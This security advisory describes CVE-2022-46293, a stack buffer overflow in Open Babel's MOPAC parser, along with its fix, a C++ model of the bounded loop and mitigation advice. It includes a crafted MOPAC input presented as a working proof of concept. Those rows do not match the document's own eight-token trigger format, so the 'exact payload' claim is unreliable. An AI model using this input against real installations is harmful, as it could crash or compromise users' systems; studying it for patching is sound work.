high · 7.8 · CVE-2022-46293 · Jul 1, 2026

CVE-2022-46293: Open Babel MOPAC Output Parser Stack Buffer Overflow

Shubham Kandhare
Security Engagement Manager, SecureLayer7

Open Babel's MOPAC output reader lets an attacker overflow a fixed-size stack array by placing more than three translation-vector triplets in a crafted 'FINAL POINT AND DERIVATIVES' block, which can l

Package: openbabel
Ecosystem: pip
Affected: < 3.2.0
Fixed in: 3.2.0

The problem

The MOPAC output format reader in `mopacformat.cpp` parses translation vectors from the 'FINAL POINT AND DERIVATIVES' section into a fixed-size stack array `translationVectors[3]`.

The reading loop continued as long as each line carried 8 tokens and the atom name was `Tv`, with no check on how many vectors had already been stored. Feeding four or more complete X/Y/Z triplets writes past the end of the array, corrupting adjacent stack memory.

On a vulnerable build this is a stack-buffer-overflow that can reach arbitrary code execution.

Proof of concept

A working proof-of-concept for CVE-2022-46293 in openbabel, with the exact payload below.

```text
 FINAL POINT AND DERIVATIVES

          ATOM    CHEMICAL    BOND       BOND
         NUMBER    SYMBOL    LENGTH     ANGLE
    1       Tv    X    0    1.000000    0.0
    2       Tv    Y    0    0.000000    0.0
    3       Tv    Z    0    0.000000    0.0
    4       Tv    X    0    0.000000    0.0
    5       Tv    Y    0    1.000000    0.0
    6       Tv    Z    0    0.000000    0.0
    7       Tv    X    0    0.000000    0.0
    8       Tv    Y    0    0.000000    0.0
    9       Tv    Z    0    1.000000    0.0
   10       Tv    X    0    0.000000    0.0
   11       Tv    Y    0    0.000000    0.0
   12       Tv    Z    0    1.000000    0.0
```

The Talos advisory reproduces the exact loop: every line with 8 tokens where `token[2]` is `Tv` and `token[4]` is `Z` triggers `translationVectors[numTranslationVectors++].Set(x, y, z)`. Because `numTranslationVectors` is never capped, a fourth Z-row writes 24 bytes past the 3-element stack array (CWE-787 / CWE-119).

The same copy-pasted pattern affected five code paths across MSI, MOPAC (two issues), MOPAC Cartesian, and Gaussian formats. Commit 40e85213 adds a `numTranslationVectors < 3` guard before every `translationVectors[numTranslationVectors++].Set(...)` call, stopping the loop once the array is full.

The fix

Upgrade to Open Babel 3.2.0 (released 2026-05-26), which contains the fix commit 40e852138f21d586b7ccdce6329e7b23a87168bb. The patch adds an upper-bound check (`numTranslationVectors < 3`) before every write into `translationVectors[]` across all affected format parsers.
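A stand-alone model of the bounded read loop described above, added here as an illustration; it is not Open Babel's code. `Vec3`, `TvResult`, `readTranslationVectors` and `sampleRows` are hypothetical names, the value position `token[6]` is an assumption, and this version counts late triplets rather than stopping the loop so the rejection is observable.

```cpp
#include <array>
#include <cstdlib>
#include <sstream>
#include <string>
#include <vector>

struct Vec3 { double x, y, z; };  // stand-in for Open Babel's vector type

struct TvResult {
    std::array<Vec3, 3> vectors{};  // same capacity as translationVectors[3]
    int stored = 0;                 // plays the role of numTranslationVectors
    int rejected = 0;               // complete triplets seen after the array was full
};

// Reads Tv rows as the advisory describes: 8 tokens, token[2] == "Tv",
// token[4] names the axis, and a Z row completes one vector.
// Assumption: the coordinate value is token[6].
TvResult readTranslationVectors(const std::vector<std::string>& lines) {
    TvResult r;
    double x = 0, y = 0;
    for (const std::string& line : lines) {
        std::istringstream in(line);
        std::vector<std::string> vs;
        for (std::string t; in >> t;) vs.push_back(t);
        if (vs.size() != 8 || vs[2] != "Tv") break;  // end of the Tv rows
        const double v = std::strtod(vs[6].c_str(), nullptr);
        if (vs[4] == "X") x = v;
        else if (vs[4] == "Y") y = v;
        else if (vs[4] == "Z") {
            if (r.stored < 3)                        // the bound the fix adds
                r.vectors[r.stored++] = Vec3{x, y, v};
            else
                ++r.rejected;  // without the bound, this row would write index 3 or higher
        }
    }
    return r;
}

// Constructed sample rows (not real MOPAC output): four complete X/Y/Z triplets.
std::vector<std::string> sampleRows() {
    std::vector<std::string> rows;
    const char* axes[] = {"X", "Y", "Z"};
    for (int i = 0; i < 12; ++i)
        rows.push_back(std::to_string(i + 1) + " 1 Tv CARTESIAN " + axes[i % 3] +
                       " 0.0 " + (i % 3 == i / 3 % 3 ? "1.0" : "0.0") + " KCAL/ANGSTROM");
    return rows;
}
```

A non-zero `rejected` count on a file is a useful signal in its own right: a valid periodic structure has at most three translation vectors.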

If upgrading immediately is not possible, avoid passing untrusted MOPAC output files to `obabel` or any application using `OBConversion`.

Reported by Cisco Talos.
